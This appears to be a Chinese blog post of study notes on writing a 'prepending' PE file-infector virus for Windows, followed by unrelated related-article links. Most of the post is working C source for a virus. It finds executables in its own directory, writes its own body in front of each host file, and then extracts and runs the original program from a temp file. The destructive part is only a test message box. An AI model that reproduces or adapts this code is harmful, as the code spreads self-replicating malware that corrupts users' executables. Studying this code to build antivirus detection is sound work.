前置病毒感染方式学习笔记

最新推荐文章于 2024-05-28 16:26:50 发布
最新推荐文章于 2024-05-28 16:26:50 发布
阅读量1.6k 收藏
点赞数
分类专栏: 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ProgrammingRing/article/details/16368545
版权
本文探讨了前置病毒感染方式,类似于资源感染,病毒先于宿主程序数据写入文件。文章介绍了文件型病毒的四个关键模块:条件模块、破坏模块、感染模块和宿主程序引导模块,并详细讲解了用于判断PE文件的BOOL IsPEFile(HANDLE hFIle)函数。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本文学习自:关于PE病毒的编写学习(一~六) by yangbostar 

代码也来源于此,经过一些修改,还不是很完善。如没有添加感染标记,检查感染的文件是否已被感染过。


前置病毒,和资源感染类似,资源感染是病毒把宿主程序添加到程序的资源中,替换覆盖原程序,运行时将宿主程序释放成一个临时文件运行。前置病毒是读取病毒和宿主程序数据,然后将病毒和宿主程序数据再以病毒 --> 宿主程序的顺序写入宿主程序文件,运行时创建一个临时文件,读取程序中宿主程序的数据写入临时文件运行。

文件型病毒至少有这四个模块:
1> 条件模块:判断触发条件和寻找符合条件的宿主文件
2> 破坏模块:
3> 感染模块:
4> 宿主程序引导模块:将病毒的控制权移交给所触发病毒文件的宿主程序


BOOL IsPEFile(HANDLE hFIle)函数,它的作用是判断文件是否为PE格式文件。它把文件句柄作为参数,虽然许多函数需要文件句柄这个参数,但是作为对PE文件结构操作的函数,这样做是不恰当的,因为如果这样做就要频繁的使用SetFilePointer()、ReadFile()、WriteFile()。假若以文件指针作为参数,那么这一类关于PE结构文件操作的代码,将大大简化。

// 判断是否为PE文件
BOOL IsPeFile(PVOID ImageBase)
{
	if (NULL == ImageBase)
		return FALSE;
	PIMAGE_DOS_HEADER pstDosHeader = (PIMAGE_DOS_HEADER)ImageBase;
	if (IMAGE_DOS_SIGNATURE == pstDosHeader->e_magic)
	{
		PIMAGE_NT_HEADERS pstNtHeader = (PIMAGE_NT_HEADERS)((BYTE *)ImageBase + pstDosHeader->e_lfanew);
		if (IMAGE_NT_SIGNATURE == pstNtHeader->Signature)
			return TRUE;
	}
	return FALSE;
}


当然为了使文件以指针传入,需要将其映射到内存中,并且由于许多函数需要文件句柄,所以有以下结构:

typedef struct PEFileInformation//用这个名字是因为将来还要添加其他成员
{
	HANDLE hFile;
	HANDLE hMap;
	LPVOID ImageBase;
} PEINFORMATION, *PPEINFORMATION;

1.条件模块:
    功能:搜索病毒文件所在目录中,规定数目的exe文件 

PPEINFORMATION OpenHostFile(TCHAR *Top,
							PPEINFORMATION pPeInfo, 
							WIN32_FIND_DATA *pWin32fd)
{
	TCHAR szPath[MAX_PATH];
	_tcsncpy(szPath, Top, MAX_PATH);
	_tcsncat(szPath, pWin32fd->cFileName, MAX_PATH - _tcslen(szPath) - 1);
	pPeInfo->hFile = CreateFile(szPath, GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
	if (INVALID_HANDLE_VALUE != pPeInfo->hFile)
	{
		pPeInfo->hMap = CreateFileMapping(pPeInfo->hFile, NULL, PAGE_READWRITE, 
			0, 0, NULL);
		pPeInfo->ImageBase = MapViewOfFile(pPeInfo->hMap, FILE_MAP_READ | FILE_MAP_WRITE,
			0, 0, 0);
		if (NULL == pPeInfo->ImageBase)
			return NULL;
	}
	return pPeInfo;
}

//搜索函数  
// 函数说明:历遍该路径下的可执行文件  
// 参    数:Top   文件路径   int nCount 搜索符合要求文件的最大数目  szHostFileHandle 将找到的符合要求文件句柄储存在这里  
// 返 回 值:找到符合要求文件的数目   
DWORD SearchHostFile(TCHAR *Top, int nCount, PHANDLE szHostFileHandle)  
{  
	WIN32_FIND_DATA fd;  
	PEINFORMATION PeInfo = {0};  
	DWORD nResult = 0;  

	TCHAR szPath[MAX_PATH];  
	_tcsncpy(szPath, Top, MAX_PATH);  
	_tcsncat(szPath, TEXT("*.*"), MAX_PATH - _tcslen(szPath) - 1);  
	HANDLE hFind = FindFirstFile(szPath, &fd);  
	if (INVALID_HANDLE_VALUE != hFind)  
	{  
		OpenHostFile(Top, &PeInfo, &fd);  
		while (nResult < nCount)  
		{  
			// 如果是目录就递归搜索  
			if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)  
			{  
				if (fd.cFileName[0] != TEXT('.'))  
					nResult = SearchHostFile(fd.cFileName, nCount, szHostFileHandle);  
			}  
			else  
			{  
				if (IsPeFile(PeInfo.ImageBase))  
				{  
					szHostFileHandle[nResult] = PeInfo.hFile;  
					nResult++;  
				}  
			}  
			// 撤销内存映射  
			UnmapViewOfFile(PeInfo.ImageBase);  
			CloseHandle(PeInfo.hMap);
			PeInfo.ImageBase = NULL;
			if (!FindNextFile(hFind, &fd))  
				break;  
			OpenHostFile(Top, &PeInfo, &fd);  
			Sleep(0);  
		}  
	}  
	return nResult;  
}



2.感染模块:

// 功能:将病毒文件注入宿主文件,将原宿主文件向后移动
// 定义病毒大小,使用全局变量是因为其它模块也要用到,32768是代码在VC2005  Debug模式下的生成文件大小
// 但并非都是这样,请自行确定,如果大小错误,那么感染后的文件运行会出错
DWORD dwVirusSize = 32768;
void Infect(HANDLE hHostFile, HANDLE hLocalFile)
{
	DWORD dwHostSize = GetFileSize(hHostFile, 0);
	DWORD dwReadBytes, dwWriteBytes;

	BYTE *pLocalTempBuf = (BYTE *)malloc(dwVirusSize * sizeof(BYTE));
	BYTE *pHostTempBuf = (BYTE *)malloc(dwHostSize * sizeof(BYTE));
	ReadFile(hHostFile, pHostTempBuf, dwHostSize, &dwReadBytes, NULL);
	ReadFile(hLocalFile, pLocalTempBuf, dwVirusSize, &dwReadBytes, NULL);
	SetFilePointer(hHostFile, 0, 0, FILE_BEGIN);
	WriteFile(hHostFile, pLocalTempBuf, dwVirusSize, &dwWriteBytes, NULL);
	WriteFile(hHostFile, pHostTempBuf, dwHostSize, &dwWriteBytes, NULL);
	SetFilePointer(hHostFile, 0, 0, FILE_BEGIN);
	free(pLocalTempBuf);
	free(pHostTempBuf);
}

3.破坏模块:

//  功能:仅仅打印提示。
void Destory(void)
{
	MessageBox(NULL, TEXT("这只是个测试 :)"), TEXT("Test"), MB_OK);
}

4.宿主程序引导模块

// 功能:创建临时文件,将所触发的病毒文件的宿主程序写入,然后启动
// 宿主程序引导模块
void JumpLocalHostFile(HANDLE hLocalFile)
{
	DWORD nCount = 0;
	
	// 获取感染后的宿主文件长度
	DWORD dwHostSize = GetFileSize(hLocalFile, 0);
	if (dwHostSize == dwVirusSize)
		return ;
	
	// 申请一个宿主程序长度的缓存并读取宿主程序数据
	BYTE *pTemp = (BYTE *)malloc(dwHostSize - dwVirusSize * sizeof(BYTE));
	SetFilePointer(hLocalFile, dwVirusSize, 0, FILE_BEGIN);
	ReadFile(hLocalFile, pTemp, (dwHostSize - dwVirusSize), &nCount, NULL);
	
	// 获取临时文件路径并和文件名连接
	TCHAR szLocalPath[MAX_PATH];
	TCHAR szTempPath[MAX_PATH];
	TCHAR szTempName[50];
	GetTempPath(MAX_PATH, szTempPath);
	GetModuleFileName(NULL, szLocalPath, MAX_PATH);
	GetFileTitle(szLocalPath, szTempName, 50);
	_tcsncat(szTempPath, szTempName, MAX_PATH - _tcslen(szTempPath) - 1);
	
	// 在临时目录创建一个文件并写入数据
	HANDLE hJumpHost = CreateFile(szTempPath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ,
		NULL, CREATE_ALWAYS, 0, NULL);
	if (INVALID_HANDLE_VALUE == hJumpHost)
		return ;
	WriteFile(hJumpHost, pTemp, dwHostSize - dwVirusSize, &nCount, NULL);
	free(pTemp);
	CloseHandle(hJumpHost);

	// 运行宿主程序
	PROCESS_INFORMATION pi;
	STARTUPINFO si = {sizeof(si)};
	if (CreateProcess(szTempPath, NULL, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS,
		NULL, NULL, &si, &pi))
	{
		WaitForSingleObject(pi.hProcess, INFINITE);
		CloseHandle(pi.hProcess);
		CloseHandle(pi.hThread);
		DeleteFile(szTempPath);
	}

}

5.程序入口

#include "stdafx.h"  
#include <windows.h>  
#include <tchar.h>  
  
int APIENTRY _tWinMain(HINSTANCE hInstance,  
                       HINSTANCE hPrevInstance,  
                       LPTSTR    lpCmdLine,  
                       int       nCmdShow)  
{  
    // 获取当前文件路径并打开文件    
    TCHAR szLocalPath[MAX_PATH];    
    GetModuleFileName(NULL, szLocalPath, MAX_PATH);    
    HANDLE hFile = CreateFile(szLocalPath, GENERIC_READ, FILE_SHARE_READ, NULL,    
        OPEN_EXISTING, 0, NULL);    
    HANDLE szHostFileHandle[3];    
  
    // 去掉文件名保存目录    
    TCHAR *pStr = szLocalPath;    
    int nLen = _tcslen(szLocalPath);    
    pStr += nLen;    
    while (*(pStr - 1)!= TEXT('\\'))    
        pStr--;    
    *pStr = TEXT('\0');    
  
    // 搜索文件和注入    
    DWORD dwFoundFileNumber = SearchHostFile(szLocalPath, 3, szHostFileHandle);    
    for (int i = 0; i < dwFoundFileNumber; i++)    
    {    
        Infect(szHostFileHandle[i], hFile);    
        CloseHandle(szHostFileHandle[i]);    
    }    
    Destory();    
  
    // 运行宿主程序    
    JumpLocalHostFile(hFile);    
    CloseHandle(hFile);  
    return 0;  
}


[网络安全自学篇] 八十七.恶意代码检测技术详解及总结
杨秀璋的专栏
07-16 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了威胁情报分析,通过Python抓取FreeBuf网站“APT”主题的相关文章。这篇文章将详细总结恶意代码检测技术,包括恶意代码检测的对象和策略、特征值检测技术、校验和检测技术、启发式扫描技术、虚拟机检测技术和主动防御技术。基础性文章,希望对您有所帮助~
[系统安全] 三十二.恶意代码检测(2)常用技术详解及总结
杨秀璋的专栏
07-16 9747
前文从产业界和学术界分别详细讲解恶意代码攻击溯源的相关知识,在学术界方面,用类似于综述来介绍攻击追踪溯源的不同方法;在产业界方面,主要参考李东宏老师从企业恶意样本分析的角度介绍溯源工作。这篇文章将详细总结恶意代码检测技术,包括恶意代码检测的对象和策略、特征值检测技术、校验和检测技术、启发式扫描技术、虚拟机检测技术和主动防御技术。希望这篇文章对您有所帮助,如果文章中存在错误、理解不到位或侵权的地方,还请告知作者与海涵。且看且珍惜,加油~
宏病毒分析要点
weixin_42539095的博客
12-26 618
练习过一些宏病毒,总结一些最基本的方法 一.查看 提示启用内容,选择启用 Alt+F11即可查看宏代码 二.加密 部分宏加了密码 可以用如下工具破解 三.快速查找关键语句 大量简单的宏病毒直接在代码中搜索shell或者run即可找到关键的执行部分Ctrl+F,输入shell或者run查找,找到后下断点执行过来 选择左侧点击即可下断 然后运行 本地窗口查看,调试 添加监视即可看到关键部...
whatsapp 官网入口一款非常流行的社交软件
whatsap-协议api
02-20 2179
有了whatsapp软件你就可以与世界各地的亲朋好友聊天,同时也能很好的实现跨平台交流和无障碍的社交交流;此款WhatsApp软件完全免费使用,只要你的手机有网络,你就可以开始聊天和交谈!有了whatsapp软件你就可以与世界各地的亲朋好友聊天,同时也能很好的实现跨平台交流和无障碍的社交交流;此款WhatsApp软件完全免费使用,只要你的手机有网络,你就可以开始聊天和交谈!注意,此功能与现有的“为每个人删除”是分开的。WhatsApp Android是最近非常流行的社交软件,是一款支持跨境聊天的社交软件。
【学习的blog】牛人的博客,学习的源泉
程序人生-Flex &amp; JAVA
06-29 2056
http://space.flash8.net/space/?591172/viewspace-704311.htmlhttp://www.kxbd.com/default.asp?tag=Javascripthttp://as3study.blogbus.com/http://www.pan3d.me/tutorial/中文博客   Horidream’s Blog http://www.h
20212422 2023-2024-2 《网络与系统攻防技术》实验二实验报告
weixin_62978988的博客
04-02 1216
当我做到控制音频、摄像头的实验步骤时,有一种自己成为了“菜鸟黑客”的错觉,这些工具帮助我能够用后门获取音频、截图、人像、点击记录等敏感信息的操作,相当于在使用后门入侵到被发现这一个时间端内,被入侵的主机处于任人摆布,毫无隐私可言的状态。这条命令使用了 msfvenom 工具,生成一个 Meterpreter 反向 TCP shell 的 payload,并将其注入到指定的可执行文件中,然后将结果输出到一个名为 20212422_pwn2 的文件中。这次实验带给我的震撼很难用语言区形容。
《AV(反病毒)技术的演进》AV方法论的改善和修正部分学习笔记
黑夜黎明
05-30 850
AV辩证法  反病毒绝不是简单的技术对抗,整个AV体制,包含着很多逻辑的、法理的因素。以及工程规划的因素,有很多共性的基本原则。客观来说,这些共性原则首先被从实践中总结形成,回头来又指导着反病毒引擎乃至反病毒工具的设计。  部分原则:   1·计算机病毒归根到底是一种程序   2·计算机病毒的特征码是从程序体或程序体的某种处理结果上,选取的可以唯一确定计算机病毒类别的标识。   3·计算机病毒最根...
综述类paper
最新发布
apple_52478019的博客
05-28 1390
人工智能(AI)在医疗保健领域正变得不可或缺。成功应用和有前景的方法包括使用模式识别软件预处理和分析数字医学图像、利用深度学习算法进行疾病分类、数字孪生技术和计算机模拟临床试验。此外,机器学习技术用于识别电子健康记录中的模式和异常,并对可穿戴健康跟踪设备收集的数据进行即时评估,以进行深入的纵向表型分析。近年来,自动图像分类取得了显著进展,甚至在某些情况下达到了超越人类水平。
python中文语料分词处理,按字或者词cut_sentence
热门推荐
高颜值的杀生丸(此博客转载自我的博客园)
02-19 2万+
cut_sentence.py import string import jieba import jieba.posseg as psg import logging #关闭jieba日制 jieba.setLogLevel(logging.INFO) jieba.load_userdict("./corpus/keywords.txt") stopwords_path = "....
字符串的使用
jhb92的专栏
04-08 2208
1.连接字符_tcscat()    直接将一个串连接到另一个的后面_tcsncat () 将第二个参数,从开始到n个字符连到第一个参数后面2.复制字符_tcscpy()  这个就不用说了_tcsncpy() 这个功能强大a.他可以用来将字符串的某些位除去eg://szOldName :123[1].gif//从szOldName + _tcslen(szOldName) -4开始,向szOl
有关字符串的一些函数
jonathandj的专栏
08-29 903
_tcsncat_l(TCHAR* strDest,const TCHAR* strSource,size_t count) // Appends,at most,the first count characters of strSource to strDest._tcscat(char* strDest,size_t sizeInBytes,const char* strSrc) // A
13.使用更安全CRT函数(C语言)
wangqifeng10_16的专栏
08-03 3575
CRT函数
第二章:字符处理
不积跬步 无以至千里
07-30 4541
/*TCHAR; LPTSTR; LPCTSTR;*/ TCHAR szBuf1[100]={0}; TCHAR szBuf2[100]={0}; //获得字符串长度 //SIZE_T nLen=strlen(szBuf1); SIZE_T nLen=_tcslen(szBuf1); //如果在UNICODE下,"中国"此函数返回2,所以如果要得到其字节数,要*sizeof(TCHAR)
2020.1.19学习笔记
Xiao_xiaoxiao
01-20 233
学习笔记前言applicationContext上下文Integer型转Long型获得java当前的类名和方法SpringBoot RedisTemplate注入失败 前言 今天在上班的时候,踩了一些坑,先把他一个个记下来,也当作学习了。 applicationContext上下文 平时如果我们要获取上下文就必须实现ApplicationContextAware接口 package com.x...
也谈Release版本排错
求索
08-29 1419
 也谈Release版本排错  邓立波 深圳,2008-6作者联系方式:email:    libodeng@gmail.commsn:     libodeng@gmail.com  通常Release除错都是先通过SetUnhandledExceptionFilter捕获异常,然后生成报告文件,最后定位代码行,主要以下两种方法:(一)通过
对_tcscpy,_tcsncpy_s,_tcscat系列函数进行复制字节,尾部处理的测试例程
lgs7907
06-26 2445
编者:李国帅 qq:9611153 微信lgs9611153 时间:2010-2-27 背景原因: 在VC编码过程中,_tcscpy,_tcsncpy_s,_tcscat系列函数很容易出现错误,容易出现内存溢出,字符截断,字符乱码等很多问题。 编写这个测试例子,主要用来测试_tcscpy,_tcsncpy_s,_tcscat系列函数在进行字符串赋值的时候,都是复制了那些字节,结尾如何处理。 编程体会: 为了安全,一定要保证逻辑上的容错性和正确性,另外,使用熟悉的成熟函数,不熟悉的函数尽量.
PE病毒学习笔记——初识感染技术
05-16 1299
说起“感染技术”,一般印象里都是——感染文件,准确说,是“感染可执行文件”。事实上,除了文件感染,也可以是“进程感染”,也就是“进程注入”。但是相比而言,文件感染古老多了——早在单进程环境的DOS下就开始发展,而且相比“进程注入”,在我看来要复杂些。现在我们只考虑Win32环境下的文件感染。毫无疑问,读写文件的过程需要大量使用到API,如果看过我之前的关于“搜索API”的学习笔记的话,那么这个工作
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值